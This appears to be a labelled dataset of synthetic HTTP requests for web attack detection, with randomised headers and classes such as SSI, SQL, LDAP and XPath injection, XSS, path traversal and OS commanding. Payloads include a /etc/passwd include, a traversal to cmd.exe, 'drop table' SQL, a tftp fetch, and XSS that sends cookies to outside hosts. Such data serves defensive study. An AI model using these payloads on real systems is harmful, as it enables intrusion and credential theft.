UA-Disp: 0266,938,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 726x074
Via: FTP/8.3 108.142.84.77, HTTP/2.6 www.snyJdio.js
Transfer-Encoding: gzip
Upgrade: im0/0.0, gln/3.7
Warning: 245 www.etcYe.gif "ra5teOtlcka8shsedl7" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39695
Start - Id: 39686
class: SSI
GET /PU/qeginubr7rqAhyd1to/rHYGJKljqg4B.dIdi@/wnneeh.asmx?l3nigk=hOS&meo=we%5Drn%40lereplacei%27lhdaTS9&agVm6=980451&nsh=iic0g9rnhnFo&9nsa1eave=le8smdo4la7ct&tTtTd=4nasA&wLUFz=s&ahaoy=%3C%21--%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&tueteien1j2d0=%5Coepl&3irmjamwa4nl=rAegoWnC HTTP/1.1
Host: 27.150.106.11
Connection: mteht2a
Accept: application/x-tar;q=0.4, text/xml
Accept-Charset: *
Accept-Encoding: deflate, compress
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 210.184.120.254
Cookie: otefiokelkit=6
Cookie2: $Version="5"
Date: Sat, 29 Sep 07 14:16:53 UTC
ETag: "MnC6RG5yCfdECDak"
Expect: 100-continue
From: 3eirio@eo6tyedee.gov
If-Modified-Since: Mon, 01 Nov 04 11:32:20 CET
If-Unmodified-Since: Wed, 14 Jul 04 02:34:49 CET
If-Match: *
If-None-Match: "ifsvkdH_DPgVWOA3"
If-Range: *
Max-Forwards: 6
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM eWFzbG90QXl0YXM0YXR1ejdzMGZzdGFkaGNpZWtJYWZyQm5OdXM3bEJ1eXVp
Range: 11490-87515,-392,063833-721563
Referer: http://www.toajuN.de/hnhoius/nnio.php
TE: gzip;q=0.8
Trailer: User-Agent
User-Agent: epLH2dKO29 http://www.eeHf.gov
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: 9.2 www.mtqofent.png, 4.5 122.157.14.160
Transfer-Encoding: deflate
Upgrade: im0/0.0, gln/3.7
Warning: 245 www.etcYe.gif "ra5teOtlcka8shsedl7" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39686
Start - Id: 45989
class: PathTransversal
POST /sdropV0Ctsystems.qMMGq/ujibeeshu5nr/tk9DkVVEgm/dd.cfm? HTTP/1.0
Content-Length: 44
Content-Language: tieN4ny,ptmlaNT
Content-Encoding: deflate
Content-Location: http://www.tteh.it/loi7afn/0usch8go/rtjSfsi/emvbl.avi
Content-MD5: YXR0b3RyYWFBZnRkb2FlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 09 Feb 10 03:42:27 UTC
Last-Modified: Wed, 26 Jan 05 23:02:39 CET
Host: 133.30.78.102
Connection: close
Accept: audio/x-wav, text/*;q=0.5, application/rtf;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: identity
Accept-Language: ../../../WINNT/autoexec.bat
Cache-Control: only-if-cached
Cookie2: $Version="7"
Date: Mon, 05 May 08 06:27:29 UTC
Expect: 100-continue
If-Modified-Since: Sun, 02 Apr 06 18:35:50 UTC
If-Match: "Hzygi--L4AMTSXRn0@@H"
If-Range: "wi-@hWX80oqrbqHaAoxq"
Max-Forwards: 31
MIME-Version: 2.0
Pragma: no-cache
Authorization: Digest uri=http://mnfodtia.cz/tiiahx/oi5uhns/aaoopgo/sd1iRb5c/Tenswol.sh
Referer: /ki68I/S2tolo.asp
TE: deflate;q=0.7,gzip;q=0.0
User-Agent: aw0w0sof http://www.enoltob.com
UA-OS: Linux
UA-Color: color16
Via: HTTP/0.2 www.ipt9r9kt.png:79657, 4.3 92.232.151.123
Transfer-Encoding: gzip
Upgrade: oslm/8.0, rot68/4.3, htrf/4.1
----: ----------------

fexuxkAhimi=qeP@EHvtO&tumoy=o@RZKazHDq8S

End - Id: 45989
Start - Id: 38908
class: LdapInjection
GET /rgig/hmHS7iOyjLqdt/etitwd9q73dsaabltne/2exdd8cedga/uoihltyLtEo/jhx/zKJi6hdivMhome3boot.ini.php3?pj0eiljmltxne=adeIupdaten+acopyge&TRY4mV=ibn%29%28%26%28objectClass%3D+++ren*%29&Onjen=61987958&whkaghhEtecpp=ts1yf&oheaio=7664023&rk82VaRadminj=i-di+ot+mN&8el=rqp%3Bineu0e9&nFJWq._=48312&4nl7rntyrI=%40knK9aeoef%7EM2tso&ne2tlfo80Ga=nrqtd%3Cae0jT+xp_ HTTP/1.1
Host: www.gimym.cz
Connection: jlthew
Accept: */*
Accept-Charset: cp-936, iso-8859-1, windows-1253
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 68.221.116.115
Cookie: nO9io8=tygoaicsintqfciiy;Oupusss=a~ iaoBf4:o3;umocha8PPG4=tdocumentiecgymstdinivminsert 
Date: Wed, 16 Dec 09 13:20:56 UTC
ETag: "@i@ld2RGu-_JOJorp8E"
Expect: 100-continue
From: neenu@alestrhlsH.gov
If-Modified-Since: Thu, 14 Jan 10 03:29:58 UTC
If-Unmodified-Since: Tue, 28 Dec 04 22:32:53 UTC
If-Match: "kmiildeUBVupveZybvsy"
If-None-Match: "72QjArJI6ifUx12"
If-Range: Wed, 31 May 06 24:02:14 GMT
Max-Forwards: 8
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: Digest username="23tl"
Range: 82450-0782,-876
Referer: /uortsU4S.bin
TE: trailers
Trailer: If-Modified-Since
User-Agent: oehgiil (l6beIYwwY; aX8ixO; 7jjkM_J; h-aaT3; sKFLsj.)
UA-OS: Win95
Via: 4.6 www.0ddt.htm
Transfer-Encoding: compress
Warning: 988 www.a3ih.gif "etgtEnsolo2a" 
X-Forwarded-For: 62.216.65.91
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38908
Start - Id: 42780
class: SqlInjection
POST /Bvo9v/GpskbWV7b/xiOXboot.ini8_replacepassthruZ-Qqd/iHS5FGjUXY8CrQJ/efJVP4yAz4hNiD5.css? HTTP/1.0
Content-Length: 41
Content-Language: alGnaes,0nsr38w
Content-Encoding: identity
Content-Location: http://www.nKoottet.be/Irhnef/3syn/endlp.mpeg
Content-MD5: b3BFZWUwaEpzb2FuaGozZg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 27 Apr 07 11:53:09 CET
Last-Modified: Mon, 15 Nov 04 10:52:14 GMT
Host: www.eansurA.ch
Connection: nnEtsxrt
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: 1T-ht;q=0.8, hr-havrenf, h-rslnN;q=0.0, 4h2cs7-i;q=0.2
Cache-Control: max-age=5197
Client-ip: 47.99.144.191
Cookie: kef2ht2d=7403242;n4=tx~;kuFzt=';  drop   table tiwceureirss;ylZctemsbjnbyd=6299;ocua=)mdankoelbe;tosca=bqanwcb
Cookie2: $Version="632"
Date: Fri, 05 Nov 04 19:22:16 UTC
ETag: "@JgiXDUnKhU3huPA"
Expect: ebdtenon
From: enntS@naaVicbad8.de
If-Modified-Since: Mon, 19 Feb 07 10:33:18 CET
If-Unmodified-Since: Wed, 02 Apr 08 04:18:55 GMT
If-Match: "t9CuI9UqJeyzIjYtUU3r"
If-None-Match: *
If-Range: *
Max-Forwards: 22
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="lnnlIedt"
Authorization: itswgn oyal=heItktt
Range: -440,44150-
Referer: http://igznhwdd.it/sdhm/Kttert/egkrstrd/ChrNrU/doie4hf.jpeg
TE: gzip,deflate,chunked
Trailer: Accept-Language
User-Agent: Mozilla/2.1 (X11; U; Open BSD i586 4.1; 8A-dr; rv:2.4.7) Gecko/09320212
UA-CPU: MIPS
UA-OS: Win95
UA-Pixels: 449x877
Via: nwbrA/0.8 123.120.50.38
Transfer-Encoding: compress
Upgrade: i5smn/7.9, wuhi/9.9, 69t/0.2, xRj6/5.5, iLew/9.1
Warning: 376 www.4nnnru6i.jpeg:5 "fh0aoaitt5L3r" "Thu, 06 Sep 07 03:50:54 CET"
X-Serial-Number: 58260161
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

ed1e=iZ8p3ou&eurr0fcemdo=fsbir:ie9hfN-t

End - Id: 42780
Start - Id: 44260
class: OsCommanding
GET /scripts/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.lHUb.st
Connection: keep-alive
Accept: video/*;q=0.2, application/*, video/*;q=0.2
Accept-Charset: koi8-r, x-mac-greek;q=0.6, euc-cn;q=0.0, iso-8859-9
Accept-Encoding: 
Accept-Language: gja-5, icadn-hliciF;q=0.5
Cache-Control: only-if-cached
Client-ip: 225.50.172.247
Cookie: iza=250635
Cookie2: $Version="544"
Date: Thu, 28 Oct 04 03:22:53 GMT
ETag: "HzqQFUqehcIoGlGbs_6"
Expect: ohder2=drntNg
From: Ce9h0dvt@naeheOu.st
If-Modified-Since: Thu, 15 May 08 03:37:44 UTC
If-Unmodified-Since: Sat, 24 Jan 09 23:48:29 UTC
If-Match: *
If-None-Match: *
If-Range: "lzLhUagNQisyk3rR7D0u"
Max-Forwards: 9774
MIME-Version: 9.1
Pragma: at7b='e'
Proxy-Authorization: YOigog n4on=aery00e
Authorization: NTLM ZWkxbGFuc3RibHR0dG1nYnJoZGdBaTJybGphc2NldDNzMWQ4aWx3aHJp
Range: 9644-,6569-1848
Referer: /ethhcL/oeil/e0fy/4wscSsit.wmn
TE: gzip
Trailer: Accept-Language
User-Agent: eiezne (hkyCEh; pLd0zj; z-UWc@; pPLdQu)
UA-CPU: 68000
UA-Disp: 9864,838,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2658x747
Via: HTTP/1.3 55.46.17.190, 1.8 165.175.26.205, FTP/0.6 www.xeee.html:06065
Transfer-Encoding: identity
Upgrade: otLd/1.3
Warning: 225 www.sthE.gif:19 "oyonins" 
X-Forwarded-For: 209.233.129.22
X-Serial-Number: 87791101469123011682
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44260
Start - Id: 38827
class: LdapInjection
GET /e4/ahr.html?ra1aeaaroaaeMl=nasey%29%28%26%28objectClass+++%3Daaai*%29&aootfeepnerTMl=666120&lmdoIhflrz5x4=cnfytaeioUheaoctne&ah9ns6re1tue=usrsi%7E+ye%3F9 HTTP/1.1
Host: www.c6feoclr.it
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: euc-jp;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 147.81.36.108
Cookie: snevOhqnc0wm=itHirhsrahttpseui;3nhoc65by=hn2YgII;Umt=7439213969;irlpm8tcIcptrpr=dzo4;lfshixa=1ltd ERk 
Cookie2: $Version="324"
Date: Thu, 03 Jul 08 13:58:51 GMT
ETag: "oUa-7gXLuicP-meF2Fl"
Expect: 100-continue
From: hth4s@nafohliad.be
If-Modified-Since: Wed, 23 Dec 09 23:45:29 CET
If-Unmodified-Since: Thu, 25 Nov 04 19:22:37 UTC
If-Match: *
If-None-Match: *
If-Range: "T1_3mZuEpS4.2wu"
Max-Forwards: 3543
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: NTLM aWxhZnJzc2Nlc2ZvRWF0bWVwc3Jlb3NzaWFzZG9lNXVnbGRhcmh1aGU=
Range: 55524-
Referer: /diur/tsAoqlmt/aehft/a1dfe/aectaI4e.mspx
TE: trailers,trailers
Trailer: If-Range
User-Agent: 1o4ym80fmI http://www.tre2.ch
UA-CPU: MIPS
UA-Disp: 0767,501,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/2.5 220.209.21.63, 4.5 www.tmt5pl.tiff:2, t9T/2.8 90.219.125.23
Transfer-Encoding: gzip
Upgrade: wnz/1.4, E79wa/9.8, 1dvs/2.3
Warning: 025 www.snltrm.tiff "tuatoroypwbr" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38827
Start - Id: 38182
class: LdapInjection
GET /fcpirntrigdSbDw.cfm?LiSao09=689&eIb=01&aiinf5=frse&a41aet3=403&ObdrlicsinamhrC=9%3Cenekboot.inilArm&rzsEtI9=88116&xrCl=9_jtkjPlz&h2ayeyEe=%29+%28+%7C++++%28w0kbe%3DalreH*%29&kEnSDEdfsnndtt=7ch&uotsdsQt=238975&s45ne6=oq-f&y2okdkhehoex=eneern1iloaatd&huusmoybu=g+f%25i HTTP/1.0
Host: www.neyootnxcx.it
Connection: jestE
Accept: */*
Accept-Charset: gb2312, euc-cn, iso-8859-9;q=0.2
Accept-Encoding: 
Accept-Language: ueyrti-hlreia;q=0.3, nIEr-m;q=0.8
Cache-Control: only-if-cached
Client-ip: 238.249.58.159
Cookie: eEroEsonnhh=640;Rau=6355;_zd7XYheiframe60Q=zsEKS;v6nperl@fromRAcSG0=bo0paf'zSen selectt0;TttlNirarti1o7a=positionaRi5driet
Cookie2: $Version="22"
Date: Mon, 21 Mar 05 11:06:34 CET
ETag: W/"cvMbx4sfux4.USQJj"
Expect: ni4g=eota
From: nethi@otsenrjp.biz
If-Modified-Since: Wed, 07 May 08 01:40:19 GMT
If-Unmodified-Since: Thu, 14 Jun 07 18:11:24 UTC
If-Match: *
If-None-Match: "rcGcf5-ncVqlFbK8"
If-Range: "qqk1eSLudV2R98BwYA"
Max-Forwards: 008
MIME-Version: 3.1
Pragma: EsRS1m=dT7u5i8c
Proxy-Authorization: Basic dGlvbDp6c2xibmU=
Authorization: Basic b3JucTpiUkV2ZTduZA==
Range: -49,281-
Referer: http://www.itslede.st/mEfh/sSoaf/DiNeUlHj/nrt2ab/wZwnbhrH.js
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: ma6eUxrHrwtskntb
UA-CPU: PowerPC
UA-Disp: 747,821,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5505x7135
Via: HTTP/4.9 www.ntt4eA.jpg:06
Transfer-Encoding: compress
Upgrade: rho/1.8, riptm/6.0
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 276586158043
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38182
Start - Id: 46797
class: XSS
PUT /s6/bfedteUdcdoutr/hS2R/7lflafte/child7Ws.css? HTTP/1.1
Content-Length: 227
Content-Language: nadewIbi,o,ibed
Content-Encoding: gzip
Content-Location: http://bveaunta.com/o96e/Tsel49o/9uleqsAe.aspx
Content-MD5: dGlvZWFzaTRtc3NvcHUzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Sep 09 11:26:24 CET
Last-Modified: Sun, 25 Jun 06 18:23:52 CET
Host: www.hleqdtikoi.org
Connection: ous2
Accept: */*
Accept-Charset: euc-jp;q=0.2, x-mac-chinesetrad;q=0.2, x-mac-ce;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 48.205.211.117
Cookie: lywtVen=8
Cookie2: $Version="55"
Date: Thu, 19 May 05 01:39:47 GMT
ETag: W/"w6tFK0pcm3oEf.Rt"
Expect: o6sRe3
From: rrxr@antg6tman.st
If-Modified-Since: Fri, 28 Oct 05 12:35:51 CET
If-Unmodified-Since: Tue, 14 Nov 06 16:51:08 GMT
If-Match: *
If-None-Match: *
If-Range: "icS7uH.4ofWdvcIWE"
Max-Forwards: 19
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Basic RDBlQWk6ZWloNg==
Authorization: NTLM dWVocnJhaHRiN2ZuUXdkbUl0bXVhbnZxR2hjb2VhYnl3ZDJxYw==
Range: 15-86
Referer: http://uof7Hog.org/no4e9/ofRnieso/eqvr6.htm
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: drlbb5 (jXkO3_8f; o4GDeTeczo)
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 818x5674
Via: Hosrl/1.4 www.n0mepn.htm, FTP/4.1 www.te9iuor.tiff:8386
Transfer-Encoding: uyqu; rjvr=yed1
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
Warning: 628 www.gpeent.gif "bdfniiksnrsxp" 
X-Forwarded-For: 90.168.251.169
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

httpreplaceKSu3imgCS@C9=5&nSciva5Sqrnn=<img  src ="  livescript:[document.location.replace    ('http://www.trnt.com/cgi-bin/stri.cgi'+document.cookie);]"  >&owssetbOrtpt=uiframe3)9ftMt<

End - Id: 46797
Start - Id: 48698
class: XPathInjection
PUT /inieerzrbtrynerdu/jOf399-2SDU2z/stdinAzM7WRI/0kfn9Srl3osLonS3llhr.php3? HTTP/1.1
Content-Length: 421
Content-Language: stmrv,wieuS,hw
Content-Encoding: deflate
Content-Location: http://gfhuej.fr/utlh/oeotere/naoa/aaEsh/rebhos1.dll
Content-MD5: dHBzdGl1YnJlb2RzdGRuaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Mar 10 10:09:36 CET
Last-Modified: Sat, 10 Jan 09 12:23:06 GMT
Host: www.siwi.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nmm8-Pnt;q=0.2, ae-7;q=0.7, hc-etute;q=0.4, ramrwte-a, hopa-6u86wc;q=0.3
Cache-Control: no-store
Client-ip: 159.42.128.3
Cookie: huuae=bosexect;cat7rVha4=taem t6 T3;@Wx0c=~6techoleisucst0insertrIhttpsalr;Eorr= ie tshobhcV
Cookie2: $Version="87"
Date: Sat, 25 Oct 08 06:45:50 CET
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: Le0arhj=himlintn
From: i1istd@23tm.net
If-Modified-Since: Sat, 07 Aug 04 11:49:23 UTC
If-Unmodified-Since: Mon, 05 Jan 04 13:43:02 CET
If-Match: *
If-None-Match: "AR71Omg_Oykgaym7b"
If-Range: *
Max-Forwards: 4233
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic bXNlczlyaDpudHNo
Authorization: Basic SXR2dTp1bkljZGE=
Range: 569156-2482
Referer: http://xvkon.gov/rzsnew/Noer4/tt3xA/7c9ese/cauFD.gif
TE: trailers,deflate;q=0.3
Trailer: Expect
User-Agent: Mozilla/5.3 (Machintosh; U; Mac OS X 6.0; in-Io; rv:9.6.2) Gecko/70910381
UA-CPU: MIPS
UA-Disp: 527,267,32
UA-Color: color8
UA-Pixels: 640x9904
Via: FTP/7.3 224.132.23.59
Transfer-Encoding: compress
Upgrade: 4mtfwe/7.8, Nuhsbd/2.0, ozoe1/6.1, oePeo/8.5, ats/0.5
Warning: 956 www.8Oqk.shtml:3 "dhfeiV6ltr" 
X-Forwarded-For: 243.139.91.251
X-Serial-Number: 3185085450816900238
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3tessrlttiesrhi=1984&moaie3heleahn=Gioin'  or  count(  path/child::node()[position()=((i  + j    +   k +   l    +    1)]     | path/child::*()[position()=(k+1)])=1  or 'asy'  = '   smkbab' or&pzooafd=md&8daiao=723628&90rrsseihmeahb=oQ.PM&kmhavingdct07Jbody=76653765&1ehozqaer2o=seqnr&tenEEW=@10ien&9aiabyis=ni&othonn=3fAH7c&h0eeTao=resjdoa

End - Id: 48698
Start - Id: 40225
class: SSI
POST /lhmielewpifYntl4/i9xYDF3V@jAy5cGs/4qsienaoeRay1se0a/ntvatrgerLhetpT1dJp/etseiaesiBot.dll? HTTP/1.1
Content-Length: 108
Content-Language: dh8r,eeepdr
Content-Encoding: compress
Content-MD5: bmVkOHNjbHR0YWx4UmJ2YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 15 Jan 07 10:21:58 GMT
Host: 183.57.81.75
Connection: keep-alive
Accept: video/quicktime;q=0.2, text/html
Accept-Encoding: 
Accept-Language: *
Cache-Control: MarS8e='ttiiu'
Cookie: VQGk=<!  #<!--    #exec   cmd="id"-->
Cookie2: $Version="09"
Date: Sun, 21 Mar 04 12:23:46 CET
If-Modified-Since: Fri, 15 Dec 06 09:19:57 CET
MIME-Version: 5.9
Authorization: Digest opaque="t2eae"
Referer: /jesk.txt
User-Agent: Mozilla/1.1 (compatible; Konqueror/7.9; Win98; syoeigez; b0htohzS)
Transfer-Encoding: gzip
Upgrade: aaHU/6.2, frpai/4.9

2chmginopauze=824&cei1riGhee=~hyck5a ta&q.rXATps30pobject.=jqgVfC-&3en4ihTtoai=ris&Stotsolr0e8E=7eATu1v62p

End - Id: 40225
Start - Id: 36779
class: OsCommanding
GET /taodtGhW33n6Pmhekrl4/or/1clhrramtdtpit9ae2y5/cGE/6enmaey8/iuHzoqky5LxhVZ_/cId6eroereiAkvvrs/l0TChG3@ogf.q7yWSxj/or8pDMwae9vunan/vAhdacgaStg/GchildInetcatVQ/et._.@1foeRw0iFIspa.jsp?abruti3=srQr%3Frcts&mau=99110&aetoaeeoisi=ekttSht&uetcNJoV=andr3a&setmriaf=%5Cn++++uftp+++++-p+++++www.elnistmareic.com++%2Fge%2Ficsichtiri%2Fonatra%2Fen%2Fnemaan%2Fneas&nmSil=t2eW.wTz2F&ebael4isxDmnua=uesscAonlxmhtpassEObz+p+9&Nr=69280939&0a2dicatPgshutdown=urn+&8elz=r9Y5a8R&WAo7=inputensdmlu6tmp+u5t&dpaBD3nD0lekhny=e%405tRM4yo&qtSebakl7S=iR-vIHS HTTP/1.1
Host: www.ieiam.it
Connection: 82to0acr
Accept: text/plain, text/*;q=0.9
Accept-Charset: x-mac-greek, iso-8859-8
Accept-Encoding: gzip, deflate
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 183.149.193.186
Cookie: lifetcdastseo1=87673155;_boot.iniautoexecconnect5K=autoexecwm2]td:oeoi;eojsrrqo=\ i
Cookie2: $Version="60"
Date: Sat, 10 Jan 04 20:46:51 UTC
ETag: "rrTq_nZJziSvCFUTT"
Expect: tYl5irs
From: hqdnlp@uehby4G.ch
If-Modified-Since: Tue, 01 Nov 05 23:47:39 UTC
If-Unmodified-Since: Sun, 25 Jul 04 06:36:29 GMT
If-Match: *
If-None-Match: "tjlqSMTcuNUJnPiC"
If-Range: Wed, 22 Nov 06 11:14:50 UTC
Max-Forwards: 5
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM NWl0Y25pb3Jha096ZWhmZXBzbmxoZW1LbTdlb25zaDJDdDVubnRib3RuaHNlZg==
Authorization: wyboL acphzxa=ieoTe
Range: 907-5,-807
Referer: /p3sh/Wtrc/usri/5y732ar/1wdeipa.php4
TE: gzip,trailers,trailers
Trailer: User-Agent
User-Agent: oMZJ2fLwM http://www.rtmT.biz
UA-CPU: MIPS
UA-Disp: 8446,438,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: FTP/9.8 212.141.128.165, 0.0 www.rtqny.html
Transfer-Encoding: compress
Upgrade: mew/8.4, w3bv/8.4, ttttf/6.4, ua5/6.2
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 5.176.183.129
X-Serial-Number: 51873709956197
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36779
Start - Id: 40730
class: SSI
GET /xokfUwX/rv/cBEcWi9vD/oF9zl@0BMlt80-514/5o/aansfuwe1n/cyHoby74aI/wget4cmdYI7IU/FWgJtBpJ0v5/php.z9NBd13/Erd/uih5rarhosAiiu.png?PEPlX07dBiframeRshutdown=yer&x-iPL=having5window.open+ HTTP/1.1
Host: 105.66.175.6:82419
Connection: close
Accept: */*;q=0.0
Accept-Charset: windows-1255, x-mac-korean, iso-8859-5, euc-tw;q=0.7, iso-8859-15;q=0.8
Accept-Encoding: <!-- #odbc statement  ="select  7ron,     Cucba,     nResrgsp    from     oeamH     order  by  2,   62,   1"   -->
Accept-Language: <!--    #odbc     connect="0l8sia,atld1e,tj3"  statement="select  *   from    Bue9h"-->
Cache-Control: max-age=9
Cookie: kIt5su=i@;nnHqOwenAl=stdin;qc3lbrgcroW=q@m
Date: Thu, 24 Jul 08 10:51:49 UTC
Expect: takh
If-Match: *
If-None-Match: *
If-Range: "ToeW@azn9duVVOgi"
Max-Forwards: 4755
Pragma: no-cache
Proxy-Authorization: Digest qop=epWbboe
Referer: /ea7edHmt/sE4No/aAolshan/OOsrtou.cgi
TE: chunked;q=0.7,deflate,trailers
User-Agent: Mozilla/2.0 (compatible; Konqueror/2.8; Windows NT; eheitMe)
Via: 7.8 20.47.157.127, HTTP/5.1 131.81.215.250
Transfer-Encoding: gzip
X-Forwarded-For: 168.72.228.20
----: ---------------------------------------

null

End - Id: 40730
Start - Id: 46923
class: XSS
PUT /pfgLUpi8mnegGtf/ptsEvl/i7lc/nemi/hNGb_T.vBg8py/8mBMa.nAxWMewMy@M/e2vyW/LU6/sMn9ufiNZPT.js? HTTP/1.1
Content-Length: 208
Content-Language: 8eEl
Content-Encoding: gzip
Content-Location: /aeuttth.bin
Content-MD5: OG5BdDNpcnNhYXJvZWh0dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Jan 08 22:56:04 GMT
Last-Modified: Thu, 09 Mar 06 03:45:20 CET
Host: www.s7e3Rs.uk:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, deflate;q=0.3, identity;q=0.4, gzip;q=0.6
Accept-Language: cwnga-McSix2, ahIo-ec
Cache-Control: only-if-cached
Client-ip: 99.107.245.11
Cookie: sicTsl=075054;ao1rsooion=tdoa>;.BDB0_echo=ewn6ntxpzoqda;eo5fs3t=80296852;iAonnn=rDjkRB;hpaktwnItna=e1C5m62lIPJe
Cookie2: $Version="0"
Date: Thu, 02 Oct 08 18:58:35 GMT
ETag: "PHboy0zuXK2HGGduWM_"
Expect: 100-continue
From: HsznrM@xmaxp.fr
If-Modified-Since: Tue, 06 Nov 07 18:09:18 UTC
If-Unmodified-Since: Fri, 08 Oct 04 09:04:22 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Jan 10 13:23:59 CET
Max-Forwards: 977
MIME-Version: 9.1
Pragma: osdaa6y=oe
Proxy-Authorization: Basic Ym9lZGVuOjl1OGpJbg==
Authorization: Basic ZG1lY21jOm5pbHE=
Range: -790
Referer: http://www.Rstm1sb.ch/9oTysu3e/k4s1h/tutr.msf
TE: deflate,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/4.7 (Windows; U; Windows NT 5.4; os-dH; rv:0.4.0) Gecko/84183825
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 537x7894
Via: 5.6 30.229.92.116:976, uhptG/9.5 245.142.8.51, awe3e/8.4 49.110.174.190:5745
Transfer-Encoding: letij
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wn9o=l ghxml I%oe~uti<iyi5w&5eaneo4ls4a7ix4=hFmJuQ4z&Mpi8MUusrpYw=<img dynsrc = "     javascript:    [window.open('http://134.7.198.138/as.php'+document.cookie);] " >

End - Id: 46923
Start - Id: 42127
class: SqlInjection
GET /t_zgoo2MJR/4lIpBfn8BG/enleC/@UQDghQTAkA/tw8eaeufssDgtwt/NVpB25en1O/n8xTW_5WG9NCBf0U/_kCT/DJwindow.open0/mPJwY8Vqua/g80bDImHzuiD.php3?t7kKnmreAsR=aalhomeew4gsprocessing-instructiono&tlurbseetHtrM=qGfkIutwete&addeletex8I=9&eDmb4lhHii6i=qtorJon%40&artE=rsP&emrfatynY=6.8D8Wuqex2&eca=metaboot.iniahrhde&rst=%27++%2F**%2F+++++OR++++%2F**%2F%27%27++%3D++%27&9e4RTo2auauet=ulnredeystra&ixeltn=Otf+naaccess_logw%7Ed+e+%40ee HTTP/1.0
Host: www.3lr1w.biz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: compress, compress, deflate, identity;q=0.1
Accept-Language: tsytdrnz-i1c9rvr, ic-vahN;q=0.4
Cache-Control: max-age=72644
Client-ip: 29.95.16.146
Cookie: tnrt4yDh=2322283835;YmQ77netcathtpass=lNtetiadmql;mA4frqinelLtb=87;7tphod7yuc=iZTH9j7V;efaesfd=nm&tncopen4emwtl]aechoe?i
Cookie2: $Version="994"
Date: Tue, 31 Aug 04 19:19:17 UTC
ETag: "36ABV77V@jd_sdUj"
Expect: aeUss=7wjdte;uElxnLe
From: islI@rcdrtQr.org
If-Modified-Since: Wed, 26 Mar 08 20:31:22 UTC
If-Unmodified-Since: Mon, 20 Aug 07 07:31:25 CET
